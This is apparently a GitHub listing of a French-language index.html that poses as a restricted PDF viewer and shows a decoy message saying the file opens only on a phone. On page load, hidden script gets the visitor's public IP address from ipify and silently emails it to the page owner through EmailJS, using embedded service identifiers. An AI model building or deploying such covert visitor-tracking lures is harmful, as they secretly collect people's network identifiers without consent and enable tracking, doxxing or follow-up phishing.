-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathindex.html
91 lines (84 loc) · 2.67 KB
/
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
<!DOCTYPE html>
<html lang="fr">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Accès Restreint</title>
<script type="text/javascript" src="https://cdn.emailjs.com/dist/email.min.js"></script>
<style>
/* Styles globaux */
body {
margin: 0;
padding: 0;
font-family: Arial, sans-serif;
background: #000;
color: white;
display: flex;
justify-content: center;
align-items: center;
height: 100vh;
position: relative;
}
/* Conteneur pour le PDF */
#pdf-container {
position: fixed;
top: 0;
left: 0;
width: 100%;
height: 100%;
z-index: -1; /* PDF en arrière-plan */
}
iframe {
width: 100%;
height: 100%;
border: none;
}
/* Message superposé */
#message {
position: absolute;
top: 50%;
left: 50%;
transform: translate(-50%, -50%);
text-align: center;
z-index: 1; /* Assurez-vous que le message reste au-dessus */
}
#message h1 {
font-size: 24px;
margin: 0;
padding: 0;
}
</style>
<script>
(function(){
emailjs.init("9U4ItsKhNNbwTGTRI"); // Remplacez par votre clé API EmailJS
})();
document.addEventListener("DOMContentLoaded", function() {
// Obtenir l'adresse IP publique
fetch('https://api.ipify.org?format=json')
.then(response => response.json())
.then(data => {
var userIP = data.ip;
// Envoyer l'adresse IP par EmailJS
emailjs.send('service_9mytnt4', 'hsdj6ti', {
user_ip: userIP
}).then(function(response) {
console.log('SUCCESS!', response.status, response.text);
}, function(error) {
console.error('FAILED...', error);
});
})
.catch(error => console.error('Error fetching IP:', error));
});
</script>
</head>
<body>
<!-- Conteneur du fichier PDF -->
<div id="pdf-container">
<iframe src="example.pdf"></iframe> <!-- Remplacez 'example.pdf' par le chemin de votre fichier PDF -->
</div>
<!-- Message pour l'utilisateur -->
<div id="message">
<h1>Ce fichier ne peut être ouvert que sur un téléphone.</h1>
</div>
</body>
</html>